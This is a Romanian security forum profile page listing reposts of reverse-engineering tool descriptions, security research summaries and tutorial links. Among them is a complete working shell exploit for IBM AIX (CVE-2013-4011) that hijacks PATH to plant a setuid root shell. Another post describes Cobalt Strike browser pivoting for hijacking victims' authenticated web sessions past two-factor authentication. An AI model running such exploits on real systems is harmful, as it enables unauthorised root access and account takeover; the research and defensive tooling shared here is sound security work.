Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    SDT Cleaner [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] Nahuel C. Riva [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] Corelabs site [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 1.0 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] Locally archived copy[/TD] [/TR] [/TABLE] SDT Cleaner is a tool that intends to clean the SSDT (system service descriptor table) from hooks. * The SDT Cleaner allows you to clean hooks installed by Anti-Virus and Firewalls. * This little tool (in this first release) tries to collect info from your current kernel and then switches to kernel land and if there are any hooks in SSDT, this tool will replace them with the original entries. Download: http://corelabs.coresecurity.com/index.php?module=Wiki&action=attachment&type=tool&page=SDT_Cleaner&file=SDTCleaner-v1.0.zip Sursa: Category:Kernel Hook Detection Tools - Collaborative RCE Tool Library
  2. Nytro
    Kernel Detective [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] GamingMaster -AT4RE [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] http://www.at4re.com [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 1.4.1 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] December 10, 2010 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] Locally archived copy[/TD] [/TR] [/TABLE] Kernel Detective is a free tool that help you detect, analyze, manually modify and fix some Windows NT kernel modifications. Kernel Detective gives you the access to the kernel directly so it's not oriented for newbies. Changing essential kernel-mode objects without enough knowledge will lead you to only one result ... BSoD ! Supported NT versions : XP/Vista/Server 2008/SEVEN Kernel Detective gives you the ability to : 1- Detect Hidden Processes. 3- Detect Hidden Threads. 2- Detect Hidden DLLs. 3- Detect Hidden Handles. 4- Detect Hidden Driver. 5- Detect Hooked SSDT. 6- Detect Hooked Shadow SSDT. 7- Detect Hooked IDT. 8- Detect Kernel-mode code modifications and hooks. 9- Disassemble (Read/Write) Kernel-mode/User-mode memory. 10- Monitor debug output on your system. Enumerate running processes and print important values like Process Id, Parent Process Id, ImageBase, EntryPoint, VirtualSize, PEB block address and EPROCESS block address. Special undocumented detection algorithms were implemented to detect hidden processes. Detect hidden and suspicious threads in system and allow user to forcely terminate them . Enumerate a specific running process Dynamic-Link Libraries and show every Dll ImageBase, EntryPoint, Size and Path. You can also inject or free specific module. Enumerate a specific running process opened handles, show every handle's object name and address and give you the ability to close the handle. Enumerate loaded kernel-mode drivers and show every driver ImageBase, EntryPoint, Size, Name and Path. Undocumented detection algorithms were implemented to detect hidden drivers. Scan the system service table (SSDT) and show every service function address and the real function address, detection algorithm improved to bypass KeServiceDescriptorTable EAT/IAT hooks.You can restore single service function address or restore the whole table. Scan the shadow system service table (Shadow SSDT) and show every shadow service function address and the real function address. You can restore single shadow service function address or restore the whole table Scan the interrupts table (IDT) and show every interrupt handler offset, selector, type, Attributes and real handler offset. This is applied to every processor in a multi-processors machines. Scan the important system kernel modules, detect the modifications in it's body and analyze it. For now it can detect and restore inline code modifications, EAT and IAT hooks. I'm looking for more other types of hooks next releases of Kernel Detective. A nice disassembler rely on OllyDbg disasm engine, thanks Oleh Yuschuk for publishing your nice disasm engine .With it you can disassemble, assemble and hex edit virtual memory of a specific process or even the kernel space memory. Kernel Detective use it's own Read/Write routines from kernel-mode and doesn't rely on any windows API. That make Kernel Detective able to R/W processes VM even if NtReadProcessMemory/NtWriteProcessMemory is hooked, also bypass the hooks on other kernel-mode important routines like KeStackAttachProcess and KeAttachProcess. Show the messages sent by drivers to the kernel debugger just like Dbgview by Mark Russinovich. It's doing this by hooking interrupt 0x2d wich is responsible for outputing debug messages. Hooking interrupts may cause problems on some machines so DebugView is turned off by default, to turn it on you must run Kernel Detective with "-debugv" parameter. Download: http://www.woodmann.com/collaborative/tools/images/Bin_Kernel_Detective_2010-12-10_17.28_Kernel_Detective_v1.4.1.rar Sursa: Category:Kernel Hook Detection Tools - Collaborative RCE Tool Library
  3. Nytro
    Codetective Analysis Tool [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] Francisco Gama Tabanez Ribeiro [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] http://www.digitalloft.org [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 0.7 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] March 26, 2012 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] Locally archived copy[/TD] [/TR] [/TABLE] Sometimes we ran into hashes and other codes and can't figure out where did they came from and how they were built. If you work on pen-testing that might easily happen when you are testing systems from a black box perspective and you are able to grab a password file with hashed contents maybe from an exposed backup file or by dumping memory.. This may also be useful as a part of a fingerprinting process. You can either use a generic version or as a plugin for the Volatility framework. The usage is similar. Currently supports: shadow and SAM files, phpBB3, Wordpress, Joomla, CRC, LM, NTLM, MD4, MD5, Apr, SHA1, SHA256, base64, MySQL323, MYSQL4+, MSSQL2000, MSSQL2005, DES, RipeMD320, Whirlpool, SHA1, SHA224, SHA256, SHA384, SHA512, Blowfish, UUID Download: http://www.woodmann.com/collaborative/tools/images/Bin_Codetective_Analysis_Tool_2012-4-13_15.31_codetective.zip Sursa: Category:Crypto Tools - Collaborative RCE Tool Library
  4. Nytro
    [h=3]Visual DuxDebugger[/h]Visual DuxDebugger is a 64-bit debugger disassembler for Windows, especially useful when source code is unavailable.The user interface is very intuitive so it makes very simple any task in reverse engineering, you can edit code, registers, and memory. Visual DuxDebugger provides wide information about the process being debugged, showing all loaded modules with all exported functions, call stack, threads and much more. The main difference with others debuggers is that Visual DuxDebugger can debug child-processes and multiple-processes. Software Reverse Engineering is commonly used: · As a learning tool to understand undocumented APIs. · As a way to make new compatible products. · For making software interoperate more effectively. · To bridge different operating systems or databases. · To analyze possible spyware / malware. · To uncover and exploit vulnerabilities. · To audit software. · To fix complex bugs. · For litigation support. Download: http://www.duxcore.com/index.php/prod/visual-duxdebugger/overview
  5. Nytro
    EDB Linux Debugger [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] Evan Teran [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] CodeF00 [ Projects ] [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 0.9.17 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] April 14, 2011 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] http://codef00.com/projects/debugger-0.9.17.tgz[/TD] [/TR] [/TABLE] Features * Intuitive GUI interface * The usual debugging operations (step-into/step-over/run/break) * Conditional breakpoints * Debugging core is implemented as a plugin so people can have drop in replacements. Of course if a given platform has several debugging APIs available, then you may have a plugin that implements any of them. * Basic instruction analysis * View/Dump memory regions * Effective address inspection * The data dump view is tabbed, allowing you to have several views of memory open at the same time and quickly switch between them. * Importing of symbol maps * Plugins o Search for binary strings o Code Bookmarks o Breakpoint management o Check for updates o Environment variable viewer o Heap block enumeration o Opcode search engine plugin has basic functionality (similar to msfelfscan/msfpescan) o Open file enumeration o Reference finder o String searching (like strings command in *nix) One of the main goals of this debugger is isolation of the debugger core from the display you see. The interface is written in QT4 and thus source portable to many platforms. The debugger core is actually a plugin and the platform specific code is isolated to just a few files, porting to a new OS would require porting these few files and implementing a plugin which implements the "DebuggerCoreInterface" interface. Also, because the plugins are based on the QPlugin API, and do their work through the DebuggerCoreInterface object, they are almost always portable with just a simple recompile. So far, the only plugin I have written which would not port with just a recompile is the heap analysis plugin, due to it's highly system specific nature. Download: http://codef00.com/projects/debugger-0.9.17.tgz Sursa: Category:Ring 3 Debuggers - Collaborative RCE Tool Library
  6. Nytro
    PEiD [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] BoB [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] BobSoft - [Main Page] [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 0.95 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] March 31, 2008 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] http://www.woodmann.com/BobSoft/Files/Other/PEiD-0.95-20081103.zip[/TD] [/TR] [/TABLE] PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 600 different signatures in PE files. PEiD is special in some aspects when compared to other identifiers already out there! 1. It has a superb GUI and the interface is really intuitive and simple. 2. Detection rates are amongst the best given by any other identifier. 3. Special scanning modes for *advanced* detections of modified and unknown files. 4. Shell integration, Command line support, Always on top and Drag'n'Drop capabilities. 5. Multiple file and directory scanning with recursion. 6. Task viewer and controller. 7. Plugin Interface with plugins like Generic OEP Finder and Krypto ANALyzer. 8. Extra scanning techniques used for even better detections. 9. Heuristic Scanning options. 10. New PE details, Imports, Exports and TLS viewers 11. New built in quick disassembler. 12. New built in hex viewer. 13. External signature interface which can be updated by the user. Download: http://www.woodmann.com/BobSoft/Files/Other/PEiD-0.95-20081103.zip Sursa: Category:Packer Identifiers - Collaborative RCE Tool Library
  7. Nytro
    RDG Packer Detector [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] RDGMax [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] RDGMax - RDGSoFT [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 0.6.7 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] June 26, 2011 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] http://rdgsoft.8k.com/images/v0.6.7%20Vx%20Edition/RDG%20Packer%20Detector%20v0.6.7%202011%20Vx-Edition.rar[/TD] [/TR] [/TABLE] RDG Packer Detector is a detector packers, Cryptors, Compilers, Packers Scrambler,Joiners,Installers. -Holds Fast detection system.. -Has detection system Powerful Analyzing the complete file, allowing the detection of Muli-packers in several cases. -You can create your own Signatures detection. -Holds Crypto-Graphic Analyzer. -Allows you to calculate the checksum of a file. -Allows you to calculate the Entropy, reporting if the program looked at the compressed, encrypted or not. -OEP-Detector (Original Point of Entry) of a program. -You can Check and download and you always signaturas.RDG Packer Detector will be updated. -Plug-ins Loader.. -Signatures converter. -Detector distortive Entry Point. -De-Binder an extractor attachments. -System Improved heuristic. What's New! v0.6.6 -New Interface! -Fast Mode Detection and Mode Powerful Improved! -Super base signatures Updated! -Heuristic detection of Binders -Detection and Extraction Overlay! -Check and Auto-Update of signatures! -Super Fast Detection of MD5 Hash! -Support for Multiple Plug-ins for both RDG Packer Detector and other detectors! -Detection of Multiple-MPG formats, GIF, RAR, ZIP, MP3 etc.. -Detection and removal of attachments! Download: http://rdgsoft.8k.com/images/v0.6.7%20Vx%20Edition/RDG%20Packer%20Detector%20v0.6.7%202011%20Vx-Edition.rar Sursa: Category:PE EXE Signature Tools - Collaborative RCE Tool Library
  8. Nytro
    Java Decompiler [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] Java Decompiler project [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] http://java.decompiler.free.fr [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 0.3.2 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] March 20, 2010 [/TD] [/TR] [/TABLE] The “Java Decompiler project” aims to develop tools in order to decompile and analyze Java 5 “byte code” and the later versions. JD-Core is a freeware library that reconstructs Java source code from one or more “.class” files. JD-Core may be used to recover lost source code and explore the source of Java runtime libraries. New features of Java 5, such as annotations, generics or type “enum”, are supported. JD-GUI and JD-Eclipse include JD-Core library. JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields. JD-Eclipse is a plug-in for the Eclipse platform. It allows you to display all the Java sources during your debugging process, even if you do not have them all. JD-Core, JD-GUI and JD-Eclipse are free for non-commercial use. This means that JD-Core, JD-GUI and JD-Eclipse shall not be included or embedded into commercial software products. Nevertheless, these projects may be freely used for personal needs in a commercial or non-commercial environments. Download: http://java.decompiler.free.fr/ Sursa: Category:Java Decompilers - Collaborative RCE Tool Library
  9. Nytro

    Javassist

    Nytro posted a topic in Programe utile

    Javassist [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] Shigeru Chiba [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] http://www.csg.is.titech.ac.jp/~chiba/javassist/ [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 3.12.0.GA [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] April 16, 2010 [/TD] [/TR] [/TABLE] Javassist (Java Programming Assistant) makes Java bytecode manipulation simple. It is a class library for editing bytecodes in Java; it enables Java programs to define a new class at runtime and to modify a class file when the JVM loads it. Unlike other similar bytecode editors, Javassist provides two levels of API: source level and bytecode level. If the users use the source-level API, they can edit a class file without knowledge of the specifications of the Java bytecode. The whole API is designed with only the vocabulary of the Java language. You can even specify inserted bytecode in the form of source text; Javassist compiles it on the fly. On the other hand, the bytecode-level API allows the users to directly edit a class file as other editors. Aspect Oriented Programming: Javassist can be a good tool for adding new methods into a class and for inserting before/after/around advice at the both caller and callee sides. Reflection: One of applications of Javassist is runtime reflection; Javassist enables Java programs to use a metaobject that controls method calls on base-level objects. No specialized compiler or virtual machine are needed. Download: www.csg.is.titech.ac.jp/~chiba/javassist/ Sursa: Category:Java Executable Editors & Patchers - Collaborative RCE Tool Library
  10. Nytro
    Malzilla [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] Boban bobby Spasic [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] Malzilla - malware hunting tool [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 1.2.0 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] November 2, 2008 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] Malzilla - Malware hunting tool[/TD] [/TR] [/TABLE] Malware hunting tool. Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. MalZilla is a useful program for use in exploring malicious pages. It allows you to choose your own user agent and referrer, and has the ability to use proxies. It shows you the full source of webpages and all the HTTP headers. It gives you various decoders to try and deobfuscate javascript aswell. Download: http://malzilla.sourceforge.net/downloads.html Sursa: Category:Javascript Deobfuscators - Collaborative RCE Tool Library
  11. Nytro
    [h=2]PE-bear – version 0.2.5 avaliable![/h] Hi! Finally, I found some time for PE-bear… Thank you for all your comments and feature requests. I did not manage to implement them all for this release, but i noted them all, and I promise, none will be neglected. You can expect new bundle of features 7th October 2013. But first, take a look what comes this time… Links to download are (as usual) here:PE-bear | hasherezade's 1001 nights [h=2]Changelog[/h] Special thanks to Ange Albertini for testing and consultation! Major Features: [feat#1] Permanently visible Hex/Text view [feat#2] Highlighting Hex/Text representation of any selected element [feat#3] Update notification [feat#4] Showing position of Entry Point on left PE structure tree [feat#5] In Disasm – resolving strings pushed on the stack [feat#5] Configurable disasembly bit mode …and others Screenshots: [feat#1] Permanently visible Hex/Text view [feat#2] Highlighting Hex/Text representation of any selected element [feat#5] Configurable disasembly bit mode Navigation changes Download: http://hshrzd.wordpress.com/pe-bear/ Sursa: https://hshrzd.wordpress.com/2013/09/26/pe-bear-version-0-2-5-avaliable/
  12. Nytro
    Browser Pivoting (Get past two-factor auth) September 26, 2013 Several months ago, I was asked if I had a way to get past two-factor authentication on web applications. Criminals do it, but penetration testers don’t. To solve this problem, I built a man-in-the-browser capability for penetration testers and red teams. I call it browser pivoting. A browser pivot is an HTTP proxy server that injects into a 32-bit Internet Explorer process. By browsing through this proxy server, I can reach any website my target logged into–as them. If the target logs into their web mail, I’m logged into their web mail. If they send sap stories to their ex-girlfriend on Facebook, I read them. If they use DropBox’s website to store and manage files, I’ll download the best ones. If they’re connected to an intranet portal site; I’m there too. How it Works Internet Explorer’s architecture makes Browser Pivoting possible. Internet Explorer is an application that consumes several libraries. WinINet is the library Internet Explorer uses to communicate. The WinINet API is popular with malware developers because it allows them to request content from a URL with very little code. WinINet is more than a high-level HTTP library built on top of Windows sockets. WinINet manages a lot of state for the applications that use it. I became familiar with WinINet during Beacon‘s development. I tried to use the Cookie header to send information. I was baffled when this cookie kept coming back blank. I didn’t know this at the time, but WinINet removed my cookie to insert the cookie from its store into my request. I had to set a INTERNET_FLAG_NO_COOKIES flag before I could programmatically send my cookie. Cookies aren’t the only thing WinINet forces into a request. WinINet will also retransmit “credential material” which includes a previously provided username/password or client SSL certificate. If WinINet is communicating with a site in the Intranet Zone (and the user’s settings permit it); WinINet will automatically try to logon with the user’s default credentials. The WinINet consumer must set the INTERNET_OPTION_SUPPRESS_SERVER_AUTH flag to disable this behavior. WinINet is the layer that manages Internet Explorer’s cache, history, cookies, HTTP authentication, and SSL session state. Inheriting this managed state isn’t a bug–it’s a feature. A browser pivot is an HTTP proxy server that fulfills requests with WinINet. The process this proxy server lives in is important. If I inject this proxy server into notepad.exe, I don’t get anything interesting. Magic happens when I inject [0] this proxy server into the Internet Explorer process [1]. I inherit Internet Explorer’s WinINet state with each request. If a user’s web session is secured with a stored cookie, session cookie, HTTP authentication, or client SSL certificate–I can use that session with a browser pivot [2]. Two-factor authentication is a non-issue at this point too. WinINet doesn’t care about how this session state was obtained. It just uses it. Notes [0] Several people have asked about this mysterious process injection thing I refer to. The Browser Pivot proxy server is compiled as a Reflective DLL. I use the Metasploit Framework’s post/windows/manage/reflective_dll_inject module to inject this DLL into a process I choose. [1] There’s one nuance to this: Modern versions of Internet Explorer isolate each tab in a separate process. In this case, the parent Internet Explorer process does not have access to WinINet state. The processes associated with a tab share WinINet state with the other tab processes. If you inject into Internet Explorer 10, make sure you inject into a child tab’s process. [2] WinINet session state is good until the user closes the browser. If the user closes their browser–the proxy server goes away and the attacker must inject into another process. How to keep session state–even after the browser closes, is not part of this work. How to Use It Browser Pivoting is available in today’s Cobalt Strike update. Go to [host] -> Meterpreter -> Explore -> Browser Pivot. Choose the process to inject into. Press Launch. Cobalt Strike will setup the browser pivot and start a port forward through Meterpreter for you. Setup your browser to go through the browser pivot and have at it. Here’s a demo of Browser Pivoting in action: To keep this blog post sane, I had to skip a lot of details. If you find Browser Pivoting interesting, you can learn more about it at DerbyCon. I’m speaking on the technology at 2pm on Saturday. If you’d like to try Browser Pivoting today, grab a 21-day trial of Cobalt Strike. Licensed users may get the latest with the built-in update program. Sursa: Browser Pivoting (Get past two-factor auth) | Strategic Cyber LLC
  13. Nytro
    25 Million Flows Later - Large-scale Detection of DOM-based XSS Sebastian Lekies SAP AG sebastian.lekies@sap.com Ben Stock FAU Erlangen-Nuremberg ben.stock@cs.fau.de Martin Johns SAP AG martin.johns@sap.com Abstract In recent years, the Web witnessed a move towards sophisticated client-side functionality. This shift caused a signi- cant increase in complexity of deployed JavaScript code and thus, a proportional growth in potential client-side vulnerabilities, with DOM-based Cross-site Scripting being a high impact representative of such security issues. In this paper, we present a fully automated system to detect and validate DOM-based XSS vulnerabilities, consisting of a taint-aware JavaScript engine and corresponding DOM implementation as well as a context-sensitive exploit generation approach. Using these components, we conducted a large-scale analysis of the Alexa top 5000. In this study, we identied 6167 unique vulnerabilities distributed over 480 domains, showing that 9,6% of the examined sites carry at least one DOMbased XSS problem. Download: http://ben-stock.de/wp-content/uploads/domxss.pdf
  14. Nytro
    Research detects dangerous malware hiding in peripherals By Darren Pauli on Sep 26, 2013 6:30 AM A Berlin researcher has demonstrated the capability to detect previously undetectable stealthy malware that resides in graphics and network cards. Patrick Stewin's proof of concept demonstrated that a detector could be built to find the sophisticated malware that ran on dedicated devices and attacked direct memory access (DMA). The attacks launched by the malware dubbed DAGGER targeted host runtime memory using DMA provided to hardware devices. These attacks were not within scope of antimalware systems and therefore not detected. DAGGER, also developed by Stewin and Iurii Bystrov of the FGSect Technical University of Berlin research group, attacked 32bit and 64bit Windows and Linux systems and could bypass memory address randomisation. After beginning life last year as a keylogger, DAGGER has recently been upgraded with new functionality and now included the ability to update its attack behaviour during runtime via an out-of-band channel. "DMA malware is stealthy to a point where the host cannot detect its presence," Stewin said. In a paper Stewin will present next month, he said the DMA attacks were both dangerous and undetectable. (pdf) "DMA-based attacks launched from peripherals are capable of compromising the host without exploiting vulnerabilities present in the operating system running on the host. "Therefore they present a highly critical threat to system security and integrity. Unfortunately,to date no OS (operating system) implements security mechanisms that can detect DMA-based attacks. Furthermore, attacks against memory management units have been demonstrated in the past and therefore cannot be considered trustworthy." The German Government funded research was closing in on its aim to develop a reliable detector for DMA malware. "At the moment we have a proof-of-concept that proves that a detector is possible," Stewin said in an email to SC. "It can find DAGGER." The proof-of-concept was based on a runtime monitor dubbed BARM which modelled and compared expected memory bus activity to the resulting activity, meaning malware residing on peripherals would be detected. Stewin said the detector would not significantly drain compute resources. Some detectors had been previously developed but they required that peripherals be modified or that a special debug feature exist. (pdf) (pdf) The researchers aimed to develop the proof of concept into a detector that did not require modification. The pair would present the research paper "A Primitive for Revealing Stealthy Peripheral-based Attacks on the Computing Platform's Main Memory" at the 16th International Symposium on Research in Attacks, Intrusions and Defenses in October in Saint Lucia. Sursa: http://www.scmagazine.com.au/News/358265,research-detects-dangerous-malware-hiding-in-peripherals.aspx
  15. Nytro
    Altu care a crezut rahatul cum ca poti asculta telefoane cu el? E cu lanterna? Iti dau 30 RON pe el daca are lanterna.
  16. Nytro
    Doar la iPhone ai functia de blocare a camerei foto de catre guvern daca esti in anumite zone de conflict. Doar la iPhone ai functia de amprenta care doar la backup uploadeaza amprenta ta catre serverele Apple. Doar la iPhone ai un pret de productie de 20%-30% si tu platesti ceilalti 70%-80% de dragul firmei Apple. Doar la iPhone ai un design de Justin Bieber si daca il atingi mai tare se sparge in 200 de bucati. Doar la iPhone ai caracteristici mai proaste ca la S4: rezolutie mai mica, 2 core in loc de 4 core, 8 MP in loc de 13 MP Recomand iPhone. </irony>
  17. Nytro
    Understanding C Integer Boundaries Authored by Saif El-Sherei This is a brief whitepaper tutorial to help facilitate the understanding of C integer boundaries (overflows and underflows). Download: http://packetstormsecurity.com/files/download/123371/understanding-c-integer-boundaries.pdf Sursa: Understanding C Integer Boundaries ? Packet Storm
  18. Nytro
    Return-to-libc Tutorial Authored by Saif El-Sherei This is a brief whitepaper tutorial discussing return-to-libc exploitation. Download: http://packetstormsecurity.com/files/download/123370/Return-to-libc-tutorial.pdf Sursa: Return-to-libc Tutorial ? Packet Storm
  19. Nytro
    evercookie -- never forget. DESCRIPTION evercookie is a javascript API available that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser. Additionally, if evercookie has found the user has removed any of the types of cookies in question, it recreates them using each mechanism available. Specifically, when creating a new cookie, it uses the following storage mechanisms when available: - Standard HTTP Cookies - Local Shared Objects (Flash Cookies) - Silverlight Isolated Storage - Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out - Storing cookies in Web History - Storing cookies in HTTP ETags - Storing cookies in Web cache - window.name caching - Internet Explorer userData storage - HTML5 Session Storage - HTML5 Local Storage - HTML5 Global Storage - HTML5 Database Storage via SQLite TODO: adding support for: - Caching in HTTP Authentication - Using Java to produce a unique key based off of NIC info Got a crazy idea to improve this? Email me! Download: http://samy.pl/evercookie/evercookie-0.4.tgz Sursa: http://samy.pl/evercookie/
  20. Nytro
    Versiunea mai complicata: 1. Iti creezi propriul PKI 2. Semnezi un certificat pentru fiecare HWID 3. Verifici ca user-ul sa aiba acel certificat (semnat de CA-ul tau) pentru HWID-ul sau 4. Nu stiu daca ar trebui sa iei in considerare aceasta optiune Ce face un atacator: 1. Cumpara un serial valid pentru HWID-ul lui 2. Serialul impreuna cu HWID-ul le face publice 3. Alte persoane schimba HWID (cred ca se poate) si folosesc acelasi serial
  21. Nytro
    Faci un algoritm prin care sa creezi din HWID un "serial". De exemplu sa zicem ca ai HWID "9005eefa-dad1-53b4-baab-56ecfbf9d55c". Poti face asa: 1. Faci md5 de prima parte (9005eefa) 2. Faci sha1 de ultima parte (56ecfbf9d55c) 3. Faci base64 pentru "dad1" 4. Faci rot13 pentru "53b4" 5. Faci hex pentru fiecare caracter pentru "baab" 6. Iei primii 3 octeti de la fiecare si ii concatenezi si poc, ai un serial (in hex de exemplu) Mai sus sunt doar cateva idei stupide, poti alege ce modalitati vrei. Sigur, se poate crack-ui daca cineva face reverse engineering la program, dar practic aceasta e o problema fara rezolvare: ORICE ar face cineva, tot se poate crack-ui.
  22. Nytro
    [h=1]IBM AIX 6.1 / 7.1 - Local root Privilege Escalation[/h] #!/bin/sh # Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation # Date: 2013-09-24 # Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com> # Vendor Homepage: http://www.ibm.com # Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html # Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02 # Tested on: IBM AIX 6.1 # CVE: CVE-2013-4011 echo ' mm mmmmm m m ## # # # # # # ## #mm# # m""m # # mm#mm m" "m ' echo " [*] AIX root privilege escalation" echo " [*] Kristian Erik Hermansen" echo " [*] https://linkedin.com/in/kristianhermansen" echo " +++++?????????????~.:,.:+???????????++++ +++++???????????+...:.,.,.=??????????+++ +++???????????~.,:~=~:::..,.~?????????++ +++???????????:,~==++++==~,,.?????????++ +++???????????,:=+++++++=~:,,~????????++ ++++?????????+,~~=++++++=~:,,:????????++ +++++????????~,~===~=+~,,::,:+???????+++ ++++++???????=~===++~~~+,,~::???????++++ ++++++++?????=~=+++~~~:++=~:~+???+++++++ +++++++++????~~=+++~+=~===~~:+??++++++++ +++++++++?????~~=====~~==~:,:?++++++++++ ++++++++++????+~==:::::=~:,+??++++++++++ ++++++++++?????:~~=~~~~~::,??+++++++++++ ++++++++++?????=~:~===~,,,????++++++++++ ++++++++++???+:==~:,,.:~~..+??++++++++++ +++++++++++....==+===~~=~,...=?+++++++++ ++++++++,........~=====..........+++++++ +++++................................++= =+:....................................= " TMPDIR=/tmp TAINT=${TMPDIR}/arp RSHELL=${TMPDIR}/r00t-sh cat > ${TAINT} <<-! #!/bin/sh cp /bin/sh ${RSHELL} chown root ${RSHELL} chmod 4555 ${RSHELL} ! chmod 755 ${TAINT} PATH=.:${PATH} export PATH cd ${TMPDIR} /usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null if [ -e ${RSHELL} ]; then echo "[+] Access granted. Don't be evil..." ${RSHELL} else echo "[-] Exploit failed. Try some 0day instead..." fi Sursa: IBM AIX 6.1 / 7.1 - Local root Privilege Escalation
  23. Nytro
    Autor: Nytro @ Romanian Security Team Pentru ca tot au aparut zvonuri cum ca NSA ar face MITM (Man in The Middle) - pe intelesul tuturor - ar intercepta traficul pe Internet pentru a spiona ce face lumea, ar trebui sa ne informam putin despre cum sa ne pastram anonimitatea fata de astfel de probleme. Articolul este destinat persoanelor care folosesc Mozilla, nu presupunea folosirea unor VPN-uri ci pur si simplu vreau sa prezint cateva setari pe care le puteti face in browser pentru a creste siguranta in cazul in care se incearca decriptarea traficului. Primul lucru pe care il recomand e sa va instalati acest addon pentru Firefox: https://addons.mozilla.org/ro/firefox/addon/calomel-ssl-validation/ Screenshot: Addon-ul e foarte util din mai multe privinte: 1. Va permite intr-un stil foarte simplist sa vedeti cat de puternica este encriptia folosita pe site-urile vizitate 2. Va permite sa vedeti in detaliu cum s-a realizat encriptia, acordand "puncte" pentru algoritmii folositi 3. Va permite sa faceti mai multe setari utile Am inceput sa scriu acest articol deoarece Facebook, Google si alte site-uri importante, in mod implicit, ofera o encriptie (simetrica) foarte slaba: RC4 - 128 de biti! Mai multe detalii despre algoritmul RC4 si despre problemele sale gasiti aici: https://en.wikipedia.org/wiki/RC4#Security Practic articolul se rezuma la cum puteti forta Firefox sa foloseasca niste algoritmi mai puternici si mai siguri. Cum functioneaza 